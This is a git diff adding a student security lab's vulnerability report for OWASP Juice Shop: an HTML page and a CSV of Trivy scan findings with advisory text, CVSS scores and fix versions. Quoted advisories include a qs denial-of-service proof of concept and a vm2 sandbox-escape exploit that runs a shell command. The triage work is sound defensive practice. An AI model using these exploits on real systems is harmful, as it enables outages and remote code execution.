+but they are also used by the OCSP client functions and CMP (Certificate
+Management Protocol) client implementation in OpenSSL. However the URLs used
+by these implementations are unlikely to be controlled by an attacker.

+

In this vulnerable code the out of bounds read can only trigger a crash.
+Furthermore the vulnerability requires an attacker-controlled URL to be
+passed from an application to the OpenSSL function and the user has to have
+a 'no_proxy' environment variable set. For the aforementioned reasons the
+issue was assessed as Low severity.

+

The vulnerable code was introduced in the following patch releases:
+3.0.16, 3.1.8, 3.2.4, 3.3.3, 3.4.0 and 3.5.0.

+

The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this
+issue, as the HTTP client implementation is outside the OpenSSL FIPS module
+boundary.

+ + +
Mitigation
+

3.0.17-1~deb12u3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

http://www.openwall.com/lists/oss-security/2025/09/30/5
+https://access.redhat.com/security/cve/CVE-2025-9232
+https://github.com/advisories/GHSA-76r2-c3cg-f5r9
+https://github.com/openssl/openssl/commit/2b4ec20e47959170422922eaff25346d362dcb35
+https://github.com/openssl/openssl/commit/654dc11d23468a74fc8ea4672b702dd3feb7be4b
+https://github.com/openssl/openssl/commit/7cf21a30513c9e43c4bc3836c237cf086e194af3
+https://github.com/openssl/openssl/commit/89e790ac431125a4849992858490bed6b225eadf
+https://github.com/openssl/openssl/commit/bbf38c034cdabd0a13330abcc4855c866f53d2e0
+https://nvd.nist.gov/vuln/detail/CVE-2025-9232
+https://openssl-library.org/news/secadv/20250930.txt
+https://ubuntu.com/security/notices/USN-7786-1
+https://ubuntu.com/security/notices/USN-7894-1
+https://www.cve.org/CVERecord?id=CVE-2025-9232

+ + + + + + + +
+
+
+
+ Finding 66: CVE-2022-27943 Libstdc++6 12.2.0-14+deb12u1 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 674 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libstdc++612.2.0-14+deb12u1
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

binutils: libiberty/rust-demangle.c in GNU GCC 11.2 allows stack exhaustion in demangle_const
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

libiberty/rust-demangle.c in GNU GCC 11.2 allows stack consumption in demangle_const, as demonstrated by nm-new.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2022-27943
+https://gcc.gnu.org/bugzilla/show_bug.cgi?id=105039
+https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=1a770b01ef415e114164b6151d1e55acdee09371
+https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=9234cdca6ee88badfc00297e72f13dac4e540c79
+https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=fc968115a742d9e4674d9725ce9c2106b91b6ead
+https://gcc.gnu.org/pipermail/gcc-patches/2022-March/592244.html
+https://lists.fedoraproject.org/archives/list/package- +announce%40lists.fedoraproject.org/message/ +H424YXGW7OKXS2NCAP35OP6Y4P4AW6VG/
+https://nvd.nist.gov/vuln/detail/CVE-2022-27943
+https://sourceware.org/bugzilla/show_bug.cgi?id=28995
+https://www.cve.org/CVERecord?id=CVE-2022-27943

+ + + + + + + +
+
+
+
+ Finding 67: CVE-2026-3449 @Tootallnate/Once 1.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 705 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
@tootallnate/once1.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/sqlite3/node_modules/@tootallnate/once/package.json
+
+
+
+ + + + + +
Description
+

@tootallnate/once: @tootallnate/once: Denial of Service due to incorrect control flow scoping with AbortSignal
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.0.1

+

Versions of the package @tootallnate/once before 3.0.1 are vulnerable + to Incorrect Control Flow Scoping in promise resolving when AbortSignal + option is used. The Promise remains in a permanently pending state +after the signal is aborted, causing any await or .then() usage to hang +indefinitely. This can cause a control-flow leak that can lead to +stalled requests, blocked workers, or degraded application availability.

+ + +
Mitigation
+

3.0.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-3449
+https://github.com/TooTallNate/once
+https://github.com/TooTallNate/once/commit/b9f43cc5259bee2952d91ad3cdbd201a82df448a
+https://github.com/TooTallNate/once/issues/8
+https://nvd.nist.gov/vuln/detail/CVE-2026-3449
+https://security.snyk.io/vuln/SNYK-JS-TOOTALLNATEONCE-15250612
+https://www.cve.org/CVERecord?id=CVE-2026-3449

+ + + + + + + +
+
+
+
+ Finding 68: CVE-2026-3449 @Tootallnate/Once 2.0.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 705 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
@tootallnate/once2.0.0
+ + + + + + + +
File Path
juice-shop/node_modules/@tootallnate/once/package.json
+
+
+
+ + + + + +
Description
+

@tootallnate/once: @tootallnate/once: Denial of Service due to incorrect control flow scoping with AbortSignal
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.0.1

+

Versions of the package @tootallnate/once before 3.0.1 are vulnerable + to Incorrect Control Flow Scoping in promise resolving when AbortSignal + option is used. The Promise remains in a permanently pending state +after the signal is aborted, causing any await or .then() usage to hang +indefinitely. This can cause a control-flow leak that can lead to +stalled requests, blocked workers, or degraded application availability.

+ + +
Mitigation
+

3.0.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-3449
+https://github.com/TooTallNate/once
+https://github.com/TooTallNate/once/commit/b9f43cc5259bee2952d91ad3cdbd201a82df448a
+https://github.com/TooTallNate/once/issues/8
+https://nvd.nist.gov/vuln/detail/CVE-2026-3449
+https://security.snyk.io/vuln/SNYK-JS-TOOTALLNATEONCE-15250612
+https://www.cve.org/CVERecord?id=CVE-2026-3449

+ + + + + + + +
+
+
+
+ Finding 185: CVE-2026-2391 Qs 6.13.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 20 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
qs6.13.0
+ + + + + + + +
File Path
juice-shop/node_modules/qs/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

+ + +
Description
+

qs: qs's arrayLimit bypass in comma parsing allows denial of service
+Target: Node.js
+Type: node-pkg
+Fixed version: 6.14.2

+

Summary

+

The arrayLimit option in qs does not enforce limits for comma-separated values when comma: true + is enabled, allowing attackers to cause denial-of-service via memory +exhaustion. This is a bypass of the array limit enforcement, similar to +the bracket notation bypass addressed in GHSA-6rw7-vpxm-498p +(CVE-2025-15284).

+

Details

+

When the comma option is set to true (not the default, but configurable in applications), qs allows parsing comma-separated strings as arrays (e.g., ?param=a,b,c becomes ['a', 'b', 'c']). However, the limit check for arrayLimit (default: 20) and the optional throwOnLimitExceeded occur after the comma-handling logic in parseArrayValue, + enabling a bypass. This permits creation of arbitrarily large arrays +from a single parameter, leading to excessive memory allocation.

+

Vulnerable code (lib/parse.js: lines ~40-50):

+
if (val && typeof val === 'string' && options.comma && val.indexOf(',') > -1) {
+    return val.split(',');
+}
+
+if (options.throwOnLimitExceeded && currentArrayLength >= options.arrayLimit) {
+    throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');
+}
+
+return val;
+
+ +

The split(',') returns the array immediately, skipping the subsequent limit check. Downstream merging via utils.combine + does not prevent allocation, even if it marks overflows for sparse +arrays.This discrepancy allows attackers to send a single parameter with + millions of commas (e.g., ?param=,,,,,,,,...), allocating massive arrays in memory without triggering limits. It bypasses the intent of arrayLimit, which is enforced correctly for indexed (a[0]=) and bracket (a[]=) notations (the latter fixed in v6.14.1 per GHSA-6rw7-vpxm-498p).

+

PoC

+

Test 1 - Basic bypass:

+
npm install qs
+
+ +
const qs = require('qs');
+
+const payload = 'a=' + ','.repeat(25);  // 26 elements after split (bypasses arrayLimit: 5)
+const options = { comma: true, arrayLimit: 5, throwOnLimitExceeded: true };
+
+try {
+  const result = qs.parse(payload, options);
+  console.log(result.a.length);  // Outputs: 26 (bypass successful)
+} catch (e) {
+  console.log('Limit enforced:', e.message);  // Not thrown
+}
+
+ +

Configuration:
+- comma: true
+- arrayLimit: 5
+- throwOnLimitExceeded: true

+

Expected: Throws "Array limit exceeded" error.
+Actual: Parses successfully, creating an array of length 26.

+

Impact

+

Denial of Service (DoS) via memory exhaustion.

+ + +
Mitigation
+

6.14.2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-2391
+https://github.com/ljharb/qs
+https://github.com/ljharb/qs/commit/f6a7abff1f13d644db9b05fe4f2c98ada6bf8482
+https://github.com/ljharb/qs/security/advisories/GHSA-w7fw-mjwx-w883
+https://nvd.nist.gov/vuln/detail/CVE-2026-2391
+https://www.cve.org/CVERecord?id=CVE-2026-2391

+ + + + + + + +
+
+
+
+ Finding 127: CVE-2025-57349 Messageformat 2.3.0 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1321 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
messageformat2.3.0
+ + + + + + + +
File Path
juice-shop/node_modules/messageformat/package.json
+
+
+
+ + + + + +
Description
+

messageformat has a prototype pollution vulnerability
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.0.0-beta.0

+

The messageformat package, an implementation of the Unicode +MessageFormat 2 specification for JavaScript, is vulnerable to prototype + pollution due to improper handling of message key paths in versions +prior to 2.3.0. The flaw arises when processing nested message keys +containing special characters (e.g., proto ), which can + lead to unintended modification of the JavaScript Object prototype. +This vulnerability may allow a remote attacker to inject properties into + the global object prototype via specially crafted message input, +potentially causing denial of service or other undefined behaviors in +applications using the affected component.

+ + +
Mitigation
+

3.0.0-beta.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/messageformat/messageformat
+https://github.com/messageformat/messageformat/issues/452
+https://nvd.nist.gov/vuln/detail/CVE-2025-57349

+ + + + + + + +
+
+
+
+ Finding 27: CVE-2022-27943 GCC-12-Base 12.2.0-14+deb12u1 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 674 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
gcc-12-base12.2.0-14+deb12u1
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

binutils: libiberty/rust-demangle.c in GNU GCC 11.2 allows stack exhaustion in demangle_const
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

libiberty/rust-demangle.c in GNU GCC 11.2 allows stack consumption in demangle_const, as demonstrated by nm-new.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2022-27943
+https://gcc.gnu.org/bugzilla/show_bug.cgi?id=105039
+https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=1a770b01ef415e114164b6151d1e55acdee09371
+https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=9234cdca6ee88badfc00297e72f13dac4e540c79
+https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=fc968115a742d9e4674d9725ce9c2106b91b6ead
+https://gcc.gnu.org/pipermail/gcc-patches/2022-March/592244.html
+https://lists.fedoraproject.org/archives/list/package- +announce%40lists.fedoraproject.org/message/ +H424YXGW7OKXS2NCAP35OP6Y4P4AW6VG/
+https://nvd.nist.gov/vuln/detail/CVE-2022-27943
+https://sourceware.org/bugzilla/show_bug.cgi?id=28995
+https://www.cve.org/CVERecord?id=CVE-2022-27943

+ + + + + + + +
+
+
+
+ Finding 84: CVE-2024-47764 Cookie 0.4.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Low + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 74 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
cookie0.4.2
+ + + + + + + +
File Path
juice-shop/node_modules/engine.io/node_modules/cookie/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N

+ + +
Description
+

cookie: cookie accepts cookie name, path, and domain with out of bounds characters
+Target: Node.js
+Type: node-pkg
+Fixed version: 0.7.0

+

cookie is a basic HTTP cookie parser and serializer for HTTP servers. + The cookie name could be used to set other fields of the cookie, +resulting in an unexpected cookie value. A similar escape can be used +for path and domain, which could be abused to alter other fields of the +cookie. Upgrade to 0.7.0, which updates the validation for name, path, +and domain.

+ + +
Mitigation
+

0.7.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2024-47764
+https://github.com/jshttp/cookie
+https://github.com/jshttp/cookie/commit/e10042845354fea83bd8f34af72475eed1dadf5c
+https://github.com/jshttp/cookie/pull/167
+https://github.com/jshttp/cookie/security/advisories/GHSA-pxg6-pf52-xh8x
+https://nvd.nist.gov/vuln/detail/CVE-2024-47764
+https://www.cve.org/CVERecord?id=CVE-2024-47764

+ + + + + + +
+
+ +
+ + + + + + + + + + + + + + + + + 
\ No newline at end of file
diff --git a/labs/lab10/report/findings.csv b/labs/lab10/report/findings.csv
new file mode 100644
index 00000000..517000f2
--- /dev/null
+++ b/labs/lab10/report/findings.csv
@@ -0,0 +1,246 @@
+DEDUPLICATION_DEFERRED_FIELDS,DEDUPLICATION_FIELDS,active,active_endpoint_count,active_endpoints,component_name,component_version,created,cvssv3,cvssv3_score,cvssv4,cvssv4_score,cwe,date,defect_review_requested_by,defect_review_requested_by_id,description,duplicate,duplicate_finding,duplicate_finding_id,dynamic_finding,effort_for_fixing,epss_percentile,epss_score,false_p,file_path,finding_group,fix_available,fix_version,has_endpoints,has_finding_group,has_jira_configured,has_jira_group_issue,has_jira_issue,hash_code,id,impact,is_mitigated,kev_date,known_exploited,last_reviewed,last_reviewed_by,last_reviewed_by_id,last_status_update,line,mitigated,mitigated_by,mitigated_by_id,mitigated_endpoint_count,mitigated_endpoints,mitigation,nb_occurences,numerical_severity,out_of_scope,param,payload,pgh_event_models,pk,planned_remediation_date,planned_remediation_version,publish_date,ransomware_used,references,reporter,reporter_id,review_requested_by,review_requested_by_id,risk_accepted,sast_sink_object,sast_source_file_path,sast_source_line,sast_source_object,scanner_confidence,service,severity,severity_justification,sla_age,sla_age_days,sla_days_remaining,sla_deadline,sla_expiration_date,sla_start_date,sonarqube_issue,sonarqube_issue_id,static_finding,steps_to_reproduce,test,test_id,thread_id,title,under_defect_review,under_review,unique_id_from_tool,updated,url,verified,violates_sla,vuln_id_from_tool,test,found_by,engagement_id,engagement,product_id,product,endpoints,vulnerability_ids,tags,status,notes
+,,True,0,[],marsdb,0.6.11,2026-05-12 17:37:05.190863+00:00,,,,,0,2026-05-12,,,"Command Injection in marsdb NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** NEWLINE NEWLINE All versions of `marsdb` are vulnerable to Command Injection. In the `DocumentMatcher` class, selectors on `$where` clauses are passed to a Function constructor unsanitized. 
This allows attackers to run arbitrary commands in the system when the function is executed. NEWLINE NEWLINE NEWLINE ## Recommendation NEWLINE NEWLINE No fix is currently available. Consider using an alternative package until a fix is made available. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/marsdb/package.json,,False,,False,False,,False,,73423daa2c85b788f33d85d5bb7d840df7952a4d3b32020edcf6e585c1b5cbd3,126,affected,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.190920+00:00,,,,,0,[],,,S0,False,,,,,,,,False,https://github.com/bkimminich/juice-shop/issues/1173 NEWLINE https://www.npmjs.com/advisories/1122,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,GHSA-5mrr-rgp6-x4gr Marsdb 0.6.11,False,False,,2026-05-12 17:37:05.190872+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,GHSA-5mrr-rgp6-x4gr,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],lodash,2.4.2,2026-05-12 17:37:05.154239+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H,9.1,,,1321,2026-05-12,,,nodejs-lodash: prototype pollution in defaultsDeep function leading to modifying properties NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 4.17.12 NEWLINE NEWLINE Versions of lodash lower than 4.17.12 are vulnerable to Prototype Pollution. The function defaultsDeep could be tricked into adding or modifying properties of Object.prototype using a constructor payload. 
NEWLINE ,False,,,False,,,,False,juice-shop/node_modules/sanitize-html/node_modules/lodash/package.json,,True,,False,False,,False,,36d1f6cbd728c605224c27e71649f332318dee2693aeaf53d68c060e2a8828e1,117,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.154298+00:00,,,,,0,[],4.17.12,,S0,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2019:3024 NEWLINE https://access.redhat.com/security/cve/CVE-2019-10744 NEWLINE https://github.com/advisories/GHSA-jf85-cpcp-j695 NEWLINE https://github.com/lodash/lodash/pull/4336 NEWLINE https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2019-10744.yml NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2019-10744 NEWLINE https://security.netapp.com/advisory/ntap-20191004-0005 NEWLINE https://security.netapp.com/advisory/ntap-20191004-0005/ NEWLINE https://snyk.io/vuln/SNYK-JS-LODASH-450202 NEWLINE https://support.f5.com/csp/article/K47105354 NEWLINE https://support.f5.com/csp/article/K47105354?utm_source=f5support&%3Butm_medium=RSS NEWLINE https://support.f5.com/csp/article/K47105354?utm_source=f5support&utm_medium=RSS NEWLINE https://www.cve.org/CVERecord?id=CVE-2019-10744 NEWLINE https://www.npmjs.com/advisories/1065 NEWLINE https://www.oracle.com/security-alerts/cpujan2021.html NEWLINE https://www.oracle.com/security-alerts/cpuoct2020.html,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2019-10744 Lodash 2.4.2,False,False,,2026-05-12 17:37:05.154249+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2019-10744,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],jsonwebtoken,0.4.0,2026-05-12 17:37:05.126062+00:00,CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H,9.8,,,20,2026-05-12,,,nodejs-jsonwebtoken: verification step bypass with an altered token NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 4.2.2 NEWLINE NEWLINE In jsonwebtoken node module before 4.2.2 it is 
possible for an attacker to bypass verification when a token digitally signed with an asymmetric key (RS/ES family) of algorithms but instead the attacker send a token digitally signed with a symmetric algorithm (HS* family). NEWLINE ,False,,,False,,,,False,juice-shop/node_modules/jsonwebtoken/package.json,,True,,False,False,,False,,756ae4892999afe288492599f018ef7426e7cfb8e4ea4527a6d71357a3503db7,110,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.126119+00:00,,,,,0,[],4.2.2,,S0,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2015-9235 NEWLINE https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries NEWLINE https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/ NEWLINE https://github.com/advisories/GHSA-c7hr-j4mj-j2w6 NEWLINE https://github.com/auth0/node-jsonwebtoken/commit/1bb584bc382295eeb7ee8c4452a673a77a68b687 NEWLINE https://nodesecurity.io/advisories/17 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2015-9235 NEWLINE https://www.cve.org/CVERecord?id=CVE-2015-9235 NEWLINE https://www.npmjs.com/advisories/17 NEWLINE https://www.timmclean.net/2015/02/25/jwt-alg-none.html,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2015-9235 Jsonwebtoken 0.4.0,False,False,,2026-05-12 17:37:05.126071+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2015-9235,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],jsonwebtoken,0.1.0,2026-05-12 17:37:05.104683+00:00,CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H,9.8,,,20,2026-05-12,,,nodejs-jsonwebtoken: verification step bypass with an altered token NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 4.2.2 NEWLINE NEWLINE In jsonwebtoken node module before 4.2.2 it is possible for an attacker to bypass verification when a token digitally signed with an asymmetric key (RS/ES family) of algorithms but instead the 
attacker send a token digitally signed with a symmetric algorithm (HS* family). NEWLINE ,False,,,False,,,,False,juice-shop/node_modules/express-jwt/node_modules/jsonwebtoken/package.json,,True,,False,False,,False,,878f89d0598d0236b88290febfb1899b96561b65699661be3627ae77f59954b3,105,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.104737+00:00,,,,,0,[],4.2.2,,S0,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2015-9235 NEWLINE https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries NEWLINE https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/ NEWLINE https://github.com/advisories/GHSA-c7hr-j4mj-j2w6 NEWLINE https://github.com/auth0/node-jsonwebtoken/commit/1bb584bc382295eeb7ee8c4452a673a77a68b687 NEWLINE https://nodesecurity.io/advisories/17 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2015-9235 NEWLINE https://www.cve.org/CVERecord?id=CVE-2015-9235 NEWLINE https://www.npmjs.com/advisories/17 NEWLINE https://www.timmclean.net/2015/02/25/jwt-alg-none.html,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2015-9235 Jsonwebtoken 0.1.0,False,False,,2026-05-12 17:37:05.104691+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2015-9235,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],handlebars,4.7.7,2026-05-12 17:37:05.056984+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H,9.8,,,94,2026-05-12,,,"handlebars.js: Handlebars: Remote Code Execution via crafted Abstract Syntax Tree object in compile() NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 4.7.9 NEWLINE NEWLINE Handlebars provides the power necessary to let users build semantic templates. In versions 4.0.0 through 4.7.8, `Handlebars.compile()` accepts a pre-parsed AST object in addition to a template string. 
The `value` field of a `NumberLiteral` AST node is emitted directly into the generated JavaScript without quoting or sanitization. An attacker who can supply a crafted AST to `compile()` can therefore inject and execute arbitrary JavaScript, leading to Remote Code Execution on the server. Version 4.7.9 fixes the issue. Some workarounds are available. Validate input type before calling `Handlebars.compile()`; ensure the argument is always a `string`, never a plain object or JSON-deserialized value. Use the Handlebars runtime-only build (`handlebars/runtime`) on the server if templates are pre-compiled at build time; `compile()` will be unavailable. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/handlebars/package.json,,True,,False,False,,False,,00118738db04e15491aa9ece80b707f00a55442cd91d7330d1c646bc02fbbc3b,93,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.057038+00:00,,,,,0,[],4.7.9,,S0,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-33937 NEWLINE https://github.com/handlebars-lang/handlebars.js NEWLINE https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2 NEWLINE https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9 NEWLINE https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-2w6w-674q-4c4q NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-33937 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-33937,Admin User (admin),1,,,False,,,,,,,Critical,,,7,7,2026-05-19,2026-05-19,,,,True,,Trivy Scan,3,0,CVE-2026-33937 Handlebars 4.7.7,False,False,,2026-05-12 17:37:05.056992+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-33937,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],vm2,3.9.17,2026-05-12 17:37:05.601796+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H,10.0,,,0,2026-05-12,,,"vm2 has a Sandbox Escape Vulnerability NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed 
version:** 3.11.0 NEWLINE NEWLINE ### Summary NEWLINE NEWLINE It is possible to reach `BaseHandler.getPrototypeOf`, which can be used to get arbitrary prototypes NEWLINE NEWLINE ### Details NEWLINE NEWLINE https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L655-L658 NEWLINE NEWLINE `BaseHandler` can be reached via `util.inspect` (same as https://github.com/patriksimek/vm2/commit/57971fa423abeb66f09e47e18102986549474ca8) NEWLINE NEWLINE ### PoC NEWLINE ```js NEWLINE let obj = { NEWLINE subarray: Buffer.prototype.inspect, NEWLINE slice: Buffer.prototype.slice, NEWLINE hexSlice: () => '', NEWLINE }; NEWLINE NEWLINE let sym; NEWLINE NEWLINE obj.slice(10, { NEWLINE showHidden: true, NEWLINE showProxy: true, NEWLINE depth: 10, NEWLINE stylize(a) { NEWLINE const handler = this.seen && this.seen[1]; NEWLINE NEWLINE if (handler && handler.getPrototypeOf) { NEWLINE gP = handler.getPrototypeOf; NEWLINE HObjectProto = gP(gP(gP(gP(Buffer)))); NEWLINE HObject = HObjectProto.constructor; NEWLINE sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0); NEWLINE } NEWLINE return a; NEWLINE }, NEWLINE }); NEWLINE NEWLINE obj = { NEWLINE [sym]: (depth, opt, inspect) => { NEWLINE inspect.constructor('return process')() NEWLINE .getBuiltinModule('child_process') NEWLINE .execSync('id', { stdio: 'inherit' }); NEWLINE }, NEWLINE valueOf: undefined, NEWLINE constructor: undefined, NEWLINE }; NEWLINE NEWLINE WebAssembly.compileStreaming(obj).catch(() => {}); NEWLINE ``` NEWLINE NEWLINE ### Impact NEWLINE Sandbox Escape -> RCE NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/vm2/package.json,,True,,False,False,,False,,b91f14093022b42a30684e8977b0f3d5295810a3907a3de01067a46d150cbea2,230,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.601849+00:00,,,,,0,[],3.11.0,,S0,False,,,,,,,,False,https://github.com/patriksimek/vm2 NEWLINE 
